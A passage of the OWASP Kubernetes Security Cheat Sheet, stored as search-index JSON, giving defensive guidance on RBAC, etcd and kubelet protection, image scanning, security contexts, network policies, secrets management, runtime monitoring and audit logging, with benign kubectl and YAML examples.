"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authorization-implement-role-based-access-control","title":"API Authorization - Implement role-based access control","text":"

In Kubernetes, you must be authenticated (logged in) before your request can be authorized (granted permission to access). Kubernetes expects attributes that are common to REST API requests. This means that Kubernetes authorization works with existing organization-wide or cloud-provider-wide access control systems which may handle other APIs besides the Kubernetes API.

Kubernetes authorizes API requests using the API server. It evaluates all of the request attributes against all policies and allows or denies the request. All parts of an API request must be allowed by some policy in order to proceed. This means that permissions are denied by default.

Role-based access control (RBAC) is a method of regulating access to computer or network resources based on the roles of individual users within your organization.

Kubernetes ships an integrated Role-Based Access Control (RBAC) component that matches an incoming user or group to a set of permissions bundled into roles. These permissions combine verbs (get, create, delete) with resources (pods, services, nodes) and can be namespace or cluster scoped. A set of out of the box roles are provided that offer reasonable default separation of responsibility depending on what actions a client might want to perform. It is recommended that you use the Node and RBAC authorizers together, in combination with the NodeRestriction admission plugin.

RBAC authorization uses the rbac.authorization.k8s.io API group to drive authorization decisions, allowing you to dynamically configure policies through the Kubernetes API. To enable RBAC, start the API server with the --authorization-mode flag set to a comma-separated list that includes RBAC; for example:

kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options\n

For detailed examples of utilizing RBAC, refer to Kubernetes documentation at https://kubernetes.io/docs/reference/access-authn-authz/rbac

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#restrict-access-to-etcd","title":"Restrict access to etcd","text":"

etcd is a critical Kubernetes component which stores information on state and secrets, and it should be protected differently from the rest of your cluster. Write access to the API server's etcd is equivalent to gaining root on the entire cluster, and even read access can be used to escalate privileges fairly easily.

The Kubernetes scheduler will search etcd for pod definitions that do not have a node. It then sends the pods it finds to an available kubelet for scheduling. Validation for submitted pods is performed by the API server before it writes them to etcd, so malicious users writing directly to etcd can bypass many security mechanisms - e.g. PodSecurityPolicies.

Administrators should always use strong credentials from the API servers to their etcd server, such as mutual auth via TLS client certificates, and it is often recommended to isolate the etcd servers behind a firewall that only the API servers may access.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#caution","title":"Caution","text":"

Allowing other components within the cluster to access the master etcd instance with read or write access to the full keyspace is equivalent to granting cluster-admin access. Using separate etcd instances for non-master components or using etcd ACLs to restrict read and write access to a subset of the keyspace is strongly recommended.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubelet","title":"Controlling access to the Kubelet","text":"

Kubelets expose HTTPS endpoints which grant powerful control over the node and containers. By default Kubelets allow unauthenticated access to this API. Production clusters should enable Kubelet authentication and authorization.

For more information, refer to Kubelet authentication/authorization documentation at https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-dashboard","title":"Securing Kubernetes Dashboard","text":"

The Kubernetes dashboard is a webapp for managing your cluster. It is not a part of the Kubernetes cluster itself, it has to be installed by the owners of the cluster. Thus, there are a lot of tutorials on how to do this. Unfortunately, most of them create a service account with very high privileges. This caused Tesla and some others to be hacked via such a poorly configured K8s dashboard. (Reference: Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/)

To prevent attacks via the dashboard, you should follow some tips:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-build-phase","title":"Kubernetes Security Best Practices: Build Phase","text":"

Securing containers and Kubernetes starts in the build phase with securing your container images. The two main things to do here are to build secure images and to scan those images for any known vulnerabilities.

A Container image is an immutable, lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings [https://www.docker.com/resources/what-container]. The image shares the kernel of the operating system present in its host machine.

Container images must be built using approved and secure base image that is scanned and monitored at regular intervals to ensure only secure and authentic images can be used within the cluster. It is recommended to configure strong governance policies regarding how images are built and stored in trusted image registries.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#ensure-that-only-authorized-images-are-used-in-your-environment","title":"Ensure That Only Authorized Images are used in Your Environment","text":"

Without a process that ensures that only images adhering to the organization\u2019s policy are allowed to run, the organization is open to risk of running vulnerable or even malicious containers. Downloading and running images from unknown sources is dangerous. It is equivalent to running software from an unknown vendor on a production server. Don\u2019t do that.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-registry-and-the-use-of-an-image-scanner-to-identify-known-vulnerabilities","title":"Container registry and the use of an image scanner to identify known vulnerabilities","text":"

Container registry is the central repository of container images. Based on the needs, we can utilize public repositories or have a private repository as the container registry. Use private registries to store your approved images - make sure you only push approved images to these registries. This alone reduces the number of potential images that enter your pipeline to a fraction of the hundreds of thousands of publicly available images.

Build a CI pipeline that integrates security assessment (like vulnerability scanning), making it part of the build process. The CI pipeline should ensure that only vetted code (approved for production) is used for building the images. Once an image is built, it should be scanned for security vulnerabilities, and only if no issues are found then the image would be pushed to a private registry, from which deployment to production is done. A failure in the security assessment should create a failure in the pipeline, preventing images with bad security quality from being pushed to the image registry.

Many source code repositories provide scanning capabilities (e.g. Github, GitLab), and many CI tools offer integration with open source vulnerability scanners such as Trivy or Grype.

There is work in progress being done in Kubernetes for image authorization plugins, which will allow preventing the shipping of unauthorized images. For more information, refer to the PR https://github.com/kubernetes/kubernetes/pull/27129.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-minimal-base-images-and-avoid-adding-unnecessary-components","title":"Use minimal base images and avoid adding unnecessary components","text":"

Avoid using images with OS package managers or shells because they could contain unknown vulnerabilities. If you must include OS packages, remove the package manager at a later step. Consider using minimal images such as distroless images, as an example.

Restricting what's in your runtime container to precisely what's necessary for your app is a best practice employed by Google and other tech giants that have used containers in production for many years. It improves the signal to noise of scanners (e.g. CVE) and reduces the burden of establishing provenance to just what you need.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#distroless-images","title":"Distroless images","text":"

Distroless images contains less packages compared to other images, and does not includes shell, which reduce the attack surface.

For more information on ditroless images, refer to https://github.com/GoogleContainerTools/distroless.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#scratch-image","title":"Scratch image","text":"

An empty image, ideal for statically compiled languages like Go. Because the image is empty - the attack surface it truly minimal - only your code!

For more information, refer to https://hub.docker.com/_/scratch

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-the-latest-imagesensure-images-are-up-to-date","title":"Use the latest images/ensure images are up to date","text":"

Ensure your images (and any third-party tools you include) are up to date and utilizing the latest versions of their components.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-deploy-phase","title":"Kubernetes Security Best Practices: Deploy Phase","text":"

Kubernetes infrastructure should be configured securely prior to workloads being deployed. From a security perspective, you first need visibility into what you\u2019re deploying \u2013 and how. Then you can identify and respond to security policy violations. At a minimum, you need to know:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-namespaces-to-properly-isolate-your-kubernetes-resources","title":"Use Kubernetes namespaces to properly isolate your Kubernetes resources","text":"

Namespaces give you the ability to create logical partitions and enforce separation of your resources as well as limit the scope of user permissions.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-for-a-request","title":"Setting the namespace for a request","text":"

To set the namespace for a current request, use the --namespace flag. Refer to the following examples:

kubectl run nginx --image=nginx --namespace=<insert-namespace-name-here>\nkubectl get pods --namespace=<insert-namespace-name-here>\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-preference","title":"Setting the namespace preference","text":"

You can permanently save the namespace for all subsequent kubectl commands in that context.

kubectl config set-context --current --namespace=<insert-namespace-name-here>\n

Validate it with the following command.

kubectl config view --minify | grep namespace:\n

Learn more about namespaces at https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#create-policies-to-govern-image-provenance-using-the-imagepolicywebhook","title":"Create policies to govern image provenance using the ImagePolicyWebhook","text":"

Prevent unapproved images from being used with the admission controller ImagePolicyWebhook to reject pods that use unapproved images including:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-continuous-security-vulnerability-scanning","title":"Implement Continuous Security Vulnerability Scanning","text":"

New vulnerabilities are published every day and containers might include outdated packages with recently-disclosed vulnerabilities (CVEs). A strong security posture will include regular production scanning, covering first-party containers (applications you have built and previously scanned) and third-party containers (sourced from trusted repository and vendors).

Open Source projects such as ThreatMapper can assist in identifying and prioritizing vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#regularly-apply-security-updates-to-your-environment","title":"Regularly Apply Security Updates to Your Environment","text":"

In case vulnerabilities are found in running containers, it is recommended to always update the source image and redeploy the containers.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#note","title":"NOTE","text":"

Try to avoid direct updates to the running containers as this can break the image-container relationship.

Example: apt-update  \n

Upgrading containers is extremely easy with the Kubernetes rolling updates feature - this allows gradually updating a running application by upgrading its images to the latest version.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#assess-the-privileges-used-by-containers","title":"Assess the privileges used by containers","text":"

The set of capabilities, role bindings, and privileges given to containers can greatly impact your security risk. The goal here is to adhere to the principle of least privilege and provide the minimum privileges and capabilities that would allow the container to perform its intended function.

Pod Security Policies are one way to control the security-related attributes of pods, including container privilege levels. These can allow an operator to specify the following:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#apply-security-context-to-your-pods-and-containers","title":"Apply Security Context to Your Pods and Containers","text":"

A security context is a property defined in the deployment yaml. It controls the security parameters that will be assigned to the pod/container/volume. These controls can eliminate entire classes of attacks that depend on privileged access. Read-only root file systems, for example, can prevent any attack that depends on installing software or writing to the file system.

When designing your containers and pods, make sure that you configure the security context for your pods, containers and volumes to grant only the privileges needed for the resource to function. Some of the important parameters are as follows:

Security Context Setting Description SecurityContext->runAsNonRoot Indicates that containers should run as non-root user SecurityContext->Capabilities Controls the Linux capabilities assigned to the container. SecurityContext->readOnlyRootFilesystem Controls whether a container will be able to write into the root filesystem. PodSecurityContext->runAsNonRoot Prevents running a container with 'root' user as part of the pod

Here is an example for pod definition with security context parameters:

apiVersion: v1  kind: Pod  metadata:  name: hello-world  spec:  containers:  # specification of the pod\u2019s containers  \n# ...\n# ...\n# Security Context\nsecurityContext:  readOnlyRootFilesystem: true  runAsNonRoot: true\n

For more information on security context for Pods, refer to the documentation at https://kubernetes.io/docs/tasks/configure-pod-container/security-context

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-service-mesh","title":"Implement Service Mesh","text":"

A service mesh is an infrastructure layer for microservices applications that can help reduce the complexity of managing microservices and deployments by handling infrastructure service communication quickly, securely and reliably. Service meshes are great at solving operational challenges and issues when running containers and microservices because they provide a uniform way to secure, connect and monitor microservices. Service mesh provides the following advantages:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#observability","title":"Observability","text":"

Service Mesh provides tracing and telemetry metrics that make it easy to understand your system and quickly root cause any problems.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#security","title":"Security","text":"

A service mesh provides security features aimed at securing the services inside your network and quickly identifying any compromising traffic entering your cluster. A service mesh can help you more easily manage security through mTLS, ingress and egress control, and more.

Securing microservices is hard. There are a multitude of tools that address microservices security, but service mesh is the most elegant solution for addressing encryption of on-the-wire traffic within the network.

Service mesh provides defense with mutual TLS (mTLS) encryption of the traffic between your services. The mesh can automatically encrypt and decrypt requests and responses, removing that burden from the application developer. It can also improve performance by prioritizing the reuse of existing, persistent connections, reducing the need for the computationally expensive creation of new ones. With service mesh, you can secure traffic over the wire and also make strong identity-based authentication and authorizations for each microservice.

We see a lot of value in this for enterprise companies. With a good service mesh, you can see whether mTLS is enabled and working between each of your services and get immediate alerts if security status changes.

Service mesh adds a layer of security that allows you to monitor and address compromising traffic as it enters the mesh. Istio integrates with Kubernetes as an ingress controller and takes care of load balancing for ingress. This allows you to add a level of security at the perimeter with ingress rules. Egress control allows you to see and manage external services and control how your services interact with them.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#operational-control","title":"Operational Control","text":"

A service mesh allows security and platform teams to set the right macro controls to enforce access controls, while allowing developers to make customizations they need to move quickly within these guardrails.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rbac","title":"RBAC","text":"

A strong Role Based Access Control (RBAC) system is arguably one of the most critical requirements in large engineering organizations, since even the most secure system can be easily circumvented by overprivileged users or employees. Restricting privileged users to least privileges necessary to perform job responsibilities, ensuring access to systems are set to \u201cdeny all\u201d by default, and ensuring proper documentation detailing roles and responsibilities are in place is one of the most critical security concerns in the enterprise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

Along with the many advantages, Service mesh also brings in its set of challenges, few of them are listed below:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implementing-centralized-policy-management","title":"Implementing centralized policy management","text":"

There are numerous projects which are able to provide centralized policy management for a Kubernetes cluster, most predominantly the Open Policy Agent (OPA) project, Kyverno, or Validating Admission Policy (a built-in, yet alpha (aka off by default) feature as of 1.26). In order to provide some depth, we will focus on OPA for the remainder of this cheat sheet.

OPA is a project that started in 2016 aimed at unifying policy enforcement across different technologies and systems. It can be used to enforce policies on their platforms (like Kubernetes clusters). When it comes to Kubernetes, RBAC and Pod security policies to impose fine-grained control over the cluster. But again, this will only apply to the cluster but not outside the cluster. That\u2019s where Open Policy Agent (OPA) comes into play. OPA was introduced to create a unified method of enforcing security policy in the stack.

OPA is a general-purpose, domain-agnostic policy enforcement tool. It can be integrated with APIs, the Linux SSH daemon, an object store like CEPH, etc. OPA designers purposefully avoided basing it on any other project. Accordingly, the policy query and decision do not follow a specific format. That is, you can use any valid JSON data as request attributes as long as it provides the required data. Similarly, the policy decision coming from OPA can also be any valid JSON data. You choose what gets input and what gets output. For example, you can opt to have OPA return a True or False JSON object, a number, a string, or even a complex data object. Currently, OPA is part of CNCF as an incubating project.

Most common use cases of OPA:

OPA enables you to accelerate time to market by providing pre-cooked authorization technology so you don\u2019t have to develop it from scratch. It uses a declarative policy language purpose built for writing and enforcing rules such as, \u201cAlice can write to this repository,\u201d or \u201cBob can update this account.\u201d It comes with a rich suite of tooling to help developers integrate those policies into their applications and even allow the application\u2019s end users to contribute policy for their tenants as well.

If you have homegrown application authorization solutions in place, you may not want to rip them out to swap in OPA. At least not yet. But if you are going to be decomposing those monolithic apps and moving to microservices to scale and improve developer efficiency, you\u2019re going to need a distributed authorization system and OPA (or one of the related competitors) could be the answer.

Kubernetes has given developers tremendous control over the traditional silos of compute, networking and storage. Developers today can set up the network the way they want and set up storage the way they want. Administrators and security teams responsible for the well-being of a given container cluster need to make sure developers don\u2019t shoot themselves (or their neighbors) in the foot.

OPA can be used to build policies that require, for example, all container images to be from trusted sources, that prevent developers from running software as root, that make sure storage is always marked with the encrypt bit, that storage does not get deleted just because a pod gets restarted, that limits internet access, etc.

OPA integrates directly into the Kubernetes API server, so it has complete authority to reject any resource\u2014whether compute, networking, storage, etc.\u2014that policy says doesn\u2019t belong in a cluster. Moreover, you can expose those policies earlier in the development lifecycle (e.g. the CICD pipeline or even on developer laptops) so that developers can receive feedback as early as possible. You can even run policies out-of-band to monitor results so that administrators can ensure policy changes don\u2019t inadvertently do more damage than good.

And finally, many organizations are using OPA to regulate use of service mesh architectures. So, even if you\u2019re not embedding OPA to implement application authorization logic (the top use case discussed above), you probably still want control over the APIs microservices. You can execute and achieve that by putting authorization policies into the service mesh. Or, you may be motivated by security, and implement policies in the service mesh to limit lateral movement within a microservice architecture. Another common practice is to build policies into the service mesh to ensure your compliance regulations are satisfied even when modification to source code is involved.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limiting-resource-usage-on-a-cluster","title":"Limiting resource usage on a cluster","text":"

Resource quota limits the number or capacity of resources granted to a namespace. This is most often used to limit the amount of CPU, memory, or persistent disk a namespace can allocate, but can also control how many pods, services, or volumes exist in each namespace.

Limit ranges restrict the maximum or minimum size of some of the resources above, to prevent users from requesting unreasonably high or low values for commonly reserved resources like memory, or to provide default limits when none are specified

An option of running resource-unbound containers puts your system in risk of DoS or \u201cnoisy neighbor\u201d scenarios. To prevent and minimize those risks you should define resource quotas. By default, all resources in Kubernetes cluster are created with unbounded CPU and memory requests/limits. You can create resource quota policies, attached to Kubernetes namespace, in order to limit the CPU and memory a pod is allowed to consume.

The following is an example for namespace resource quota definition that will limit number of pods in the namespace to 4, limiting their CPU requests between 1 and 2 and memory requests between 1GB to 2GB.

compute-resources.yaml:

apiVersion: v1  kind: ResourceQuota  metadata:  name: compute-resources  spec:  hard:  pods: \"4\"  requests.cpu: \"1\"  requests.memory: 1Gi  limits.cpu: \"2\"  limits.memory: 2Gi\n

Assign a resource quota to namespace:

kubectl create -f ./compute-resources.yaml --namespace=myspace\n

For more information on configuring resource quotas, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/policy/resource-quotas/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-network-policies-to-control-traffic-between-pods-and-clusters","title":"Use Kubernetes network policies to control traffic between pods and clusters","text":"

Running different applications on the same Kubernetes cluster creates a risk of one compromised application attacking a neighboring application. Network segmentation is important to ensure that containers can communicate only with those they are supposed to.

By default, Kubernetes allows every pod to contact every other pod. Traffic to a pod from an external network endpoint outside the cluster is allowed if ingress from that endpoint is allowed to the pod. Traffic from a pod to an external network endpoint outside the cluster is allowed if egress is allowed from the pod to that endpoint.

Network segmentation policies are a key security control that can prevent lateral movement across containers in the case that an attacker breaks in. One of the challenges in Kubernetes deployments is creating network segmentation between pods, services and containers. This is a challenge due to the \u201cdynamic\u201d nature of container network identities (IPs), along with the fact that containers can communicate both inside the same node or between nodes.

Users of Google Cloud Platform can benefit from automatic firewall rules, preventing cross-cluster communication. A similar implementation can be deployed on-premises using network firewalls or SDN solutions. There is work being done in this area by the Kubernetes Network SIG, which will greatly improve the pod-to-pod communication policies. A new network policy API should address the need to create firewall rules around pods, limiting the network access that a containerized can have.

The following is an example of a network policy that controls the network for \u201cbackend\u201d pods, only allowing inbound network access from \u201cfrontend\u201d pods:

POST /apis/net.alpha.kubernetes.io/v1alpha1/namespaces/tenant-a/networkpolicys  {  \"kind\": \"NetworkPolicy\",\n\"metadata\": {\n\"name\": \"pol1\"\n},\n\"spec\": {\n\"allowIncoming\": {\n\"from\": [{\n\"pods\": { \"segment\": \"frontend\" }\n}],\n\"toPorts\": [{\n\"port\": 80,\n\"protocol\": \"TCP\"\n}]\n},\n\"podSelector\": {\n\"segment\": \"backend\"\n}\n}\n}\n

For more information on configuring network policies, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/services-networking/network-policies.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data","title":"Securing data","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#keep-secrets-as-secrets","title":"Keep secrets as secrets","text":"

In Kubernetes, a Secret is a small object that contains sensitive data, like a password or token. It is important to understand how sensitive data such as credentials and keys are stored and accessed. Even though a pod is not able to access the secrets of another pod, it is crucial to keep the secret separate from an image or pod. Otherwise, anyone with access to the image would have access to the secret as well. Complex applications that handle multiple processes and have public access are especially vulnerable in this regard. It is best for secrets to be mounted into read-only volumes in your containers, rather than exposing them as environment variables.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#encrypt-secrets-at-rest","title":"Encrypt secrets at rest","text":"

The etcd database in general contains any information accessible via the Kubernetes API and may grant an attacker significant visibility into the state of your cluster.

Always encrypt your backups using a well reviewed backup and encryption solution, and consider using full disk encryption where possible.

Kubernetes supports encryption at rest, a feature introduced in 1.7, and v1 beta since 1.13. This will encrypt Secret resources in etcd, preventing parties that gain access to your etcd backups from viewing the content of those secrets. While this feature is currently beta, it offers an additional level of defense when backups are not encrypted or an attacker gains read access to etcd.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#alternatives-to-kubernetes-secret-resources","title":"Alternatives to Kubernetes Secret resources","text":"

You may want to consider using an external secrets manager to store and manage your secrets rather than storing them in Kubernetes Secrets. This provides a number of benefits over using Kubernetes Secrets, including the ability to manage secrets across multiple clusters (or clouds), and the ability to manage and rotate secrets centrally.

For more information on Secrets and their alternatives, refer to the documentation at https://kubernetes.io/docs/concepts/configuration/secret/.

Also see the Secrets Management cheat sheet for more details and best practices on managing secrets.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#finding-exposed-secrets","title":"Finding exposed secrets","text":"

Open-source tools such as SecretScanner and ThreatMapper can scan container filesystems for sensitive resources, such as API tokens, passwords, and keys. Such resources would be accessible to any user who had access to the unencrypted container filesystem, whether during build, at rest in a registry or backup, or running.

Review the secret material present on the container against the principle of 'least priviledge', and to assess the risk posed by a compromise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-runtime-phase","title":"Kubernetes Security Best Practices: Runtime Phase","text":"

The runtime phase exposes containerized applications to a slew of new security challenges. Your goal here is to both gain visibility into your running environment and detect and respond to threats as they arise.

Proactively securing your containers and Kubernetes deployments at the build and deploy phases can greatly reduce the likelihood of security incidents at runtime and the subsequent effort needed to respond to them.

First, you must monitor the most security-relevant container activities, including:

Observing container behavior to detect anomalies is generally easier in containers than in virtual machines because of the declarative nature of containers and Kubernetes. These attributes allow easier introspection into what you have deployed and its expected activity.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-pod-security-policies-to-prevent-risky-containerspods-from-being-used","title":"Use Pod Security Policies to prevent risky containers/Pods from being used","text":"

PodSecurityPolicy is a cluster-level resources available in Kubernetes (via kubectl) that is highly recommended. You must enable the PodSecurityPolicy admission controller to use it. Given the nature of admission controllers, you must authorize at least one policy - otherwise no pods will be allowed to be created in the cluster.

Pod Security Policies address several critical security use cases, including:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-runtime-security","title":"Container Runtime Security","text":"

Hardening containers at runtime gives security teams the ability to detect and respond to threats and anomalies while the containers or workloads are in a running state. This is typically carried out by intercepting the low-level system calls and looking for events that may indicate compromise. Some examples of events that should trigger an alert would include:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-sandboxing","title":"Container Sandboxing","text":"

Container runtimes typically are permitted to make direct calls to the host kernel then the kernel interacts with hardware and devices to respond to the request. Cgroups and namespaces exist to give containers a certain amount of isolation but the still kernel presents a large attack surface area. Often times in multi-tenant and highly untrusted clusters an additional layer of sandboxing is required to ensure container breakout and kernel exploits are not present. Below we will explore a few OSS technologies that help further isolate running containers from the host kernel:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#preventing-containers-from-loading-unwanted-kernel-modules","title":"Preventing containers from loading unwanted kernel modules","text":"

The Linux kernel automatically loads kernel modules from disk if needed in certain circumstances, such as when a piece of hardware is attached or a filesystem is mounted. Of particular relevance to Kubernetes, even unprivileged processes can cause certain network-protocol-related kernel modules to be loaded, just by creating a socket of the appropriate type. This may allow an attacker to exploit a security hole in a kernel module that the administrator assumed was not in use.

To prevent specific modules from being automatically loaded, you can uninstall them from the node, or add rules to block them. On most Linux distributions, you can do that by creating a file such as /etc/modprobe.d/kubernetes-blacklist.conf with contents like:

# DCCP is unlikely to be needed, has had multiple serious\n# vulnerabilities, and is not well-maintained.\nblacklist dccp\n\n# SCTP is not used in most Kubernetes clusters, and has also had\n# vulnerabilities in the past.\nblacklist sctp\n

To block module loading more generically, you can use a Linux Security Module (such as SELinux) to completely deny the module_request permission to containers, preventing the kernel from loading modules for containers under any circumstances. (Pods would still be able to use modules that had been loaded manually, or modules that were loaded by the kernel on behalf of some more-privileged process.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#compare-and-analyze-different-runtime-activity-in-pods-of-the-same-deployments","title":"Compare and analyze different runtime activity in pods of the same deployments","text":"

Containerized applications are replicated for high availability, fault tolerance, or scale reasons. Replicas should behave nearly identically; replicas with significant deviations from the others warrant further investigation. Integrate your Kubernetes security tool with other external systems (email, PagerDuty, Slack, Google Cloud Security Command Center, SIEMs [security information and event management], etc.) and leverage deployment labels or annotations to alert the team responsible for a given application when a potential threat is detected. Commercial Kubernetes security vendors should support a wide array of integrations with external tools

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#monitor-network-traffic-to-limit-unnecessary-or-insecure-communication","title":"Monitor network traffic to limit unnecessary or insecure communication","text":"

Observe your active network traffic and compare that traffic to what is allowed based on your Kubernetes network policies. Containerized applications typically make extensive use of cluster networking, and observing active networking traffic is a good way to understand how applications interact with each other and identify unexpected communication.

At the same time, comparing the active traffic with what\u2019s allowed gives you valuable information about what isn\u2019t happening but is allowed. With that information, you can further tighten your allowed network policies so that it removes superfluous connections and decreases your attack surface.

Open source projects like https://github.com/kinvolk/inspektor-gadget or https://github.com/deepfence/PacketStreamer may help with this, and commercial security solutions provide varying degrees of container network traffic analysis.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#if-breached-scale-suspicious-pods-to-zero","title":"If breached, scale suspicious pods to zero","text":"

Use Kubernetes native controls to contain a successful breach by automatically instructing Kubernetes to scale suspicious pods to zero or kill then restart instances of breached applications.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rotate-infrastructure-credentials-frequently","title":"Rotate infrastructure credentials frequently","text":"

The shorter the lifetime of a secret or credential the harder it is for an attacker to make use of that credential. Set short lifetimes on certificates and automate their rotation. Use an authentication provider that can control how long issued tokens are available and use short lifetimes where possible. If you use service account tokens in external integrations, plan to rotate those tokens frequently. For example, once the bootstrap phase is complete, a bootstrap token used for setting up nodes should be revoked or its authorization removed.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#receiving-alerts-for-security-updates-and-reporting-vulnerabilities","title":"Receiving alerts for security updates and reporting vulnerabilities","text":"

Join the kubernetes-announce group (<https://kubernetes.io/docs/reference/issues-security/security/) for emails about security announcements. See the security reporting page (https://kubernetes.io/docs/reference/issues-security/security) for more on how to report vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Kubernetes supplies cluster-based logging, allowing to log container activity into a central log hub. When a cluster is created, the standard output and standard error output of each container can be ingested using a Fluentd agent running on each node into either Google Stackdriver Logging or into Elasticsearch and viewed with Kibana.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#enable-audit-logging","title":"Enable audit logging","text":"

The audit logger is a beta feature that records actions taken by the API for later analysis in the event of a compromise. It is recommended to enable audit logging and archive the audit file on a secure server

Ensure logs are monitoring for anomalous or unwanted API calls, especially any authorization failures (these log entries will have a status message \u201cForbidden\u201d). Authorization failures could mean that an attacker is trying to abuse stolen credentials.

Managed Kubernetes providers, including GKE, provide access to this data in their cloud console and may allow you to set up alerts on authorization failures.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":"

Audit logs can be useful for compliance as they should help you answer the questions of what happened, who did what and when. Kubernetes provides flexible auditing of kube-apiserver requests based on policies. These help you track all activities in chronological order.

Here is an example of an audit log:

{\n\"kind\":\"Event\",\n\"apiVersion\":\"audit.k8s.io/v1beta1\",\n\"metadata\":{ \"creationTimestamp\":\"2019-08-22T12:00:00Z\" },\n\"level\":\"Metadata\",\n\"timestamp\":\"2019-08-22T12:00:00Z\",\n\"auditID\":\"23bc44ds-2452-242g-fsf2-4242fe3ggfes\",\n\"stage\":\"RequestReceived\",\n\"requestURI\":\"/api/v1/namespaces/default/persistentvolumeclaims\",\n\"verb\":\"list\",\n\"user\": {\n\"username\":\"user@example.org\",\n\"groups\":[ \"system:authenticated\" ]\n},\n\"sourceIPs\":[ \"172.12.56.1\" ],\n\"objectRef\": {\n\"resource\":\"persistentvolumeclaims\",\n\"namespace\":\"default\",\n\"apiVersion\":\"v1\"\n},\n\"requestReceivedTimestamp\":\"2019-08-22T12:00:00Z\",\n\"stageTimestamp\":\"2019-08-22T12:00:00Z\"\n}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#define-audit-policies","title":"Define Audit Policies","text":"

Audit policy defines rules about what events should be recorded and what data they should include. The audit policy object structure is defined in the audit.k8s.io API group. When an event is processed, it's compared against the list of rules in order. The first matching rule sets the \"audit level\" of the event.

The known audit levels are as follows:

You can pass a file with the policy to kube-apiserver using the --audit-policy-file flag. If the flag is omitted, no events are logged. Note that the rules field must be provided in the audit policy file. A policy with no (0) rules is treated as illegal.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#understanding-logging","title":"Understanding Logging","text":"

One main challenge with logging Kubernetes is understanding what logs are generated and how to use them. Let\u2019s start by examining the Kubernetes logging architecture from a birds eye view.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-logging","title":"Container logging","text":"

The first layer of logs that can be collected from a Kubernetes cluster are those being generated by your containerized applications.

Manifest is as follows.

apiVersion: v1\nkind: Pod\nmetadata:\nname: example\nspec:\ncontainers:\n- name: example\nimage: busybox\nargs: [/bin/sh, -c, 'while true; do echo $(date); sleep 1; done']\n

To apply the manifest, run:

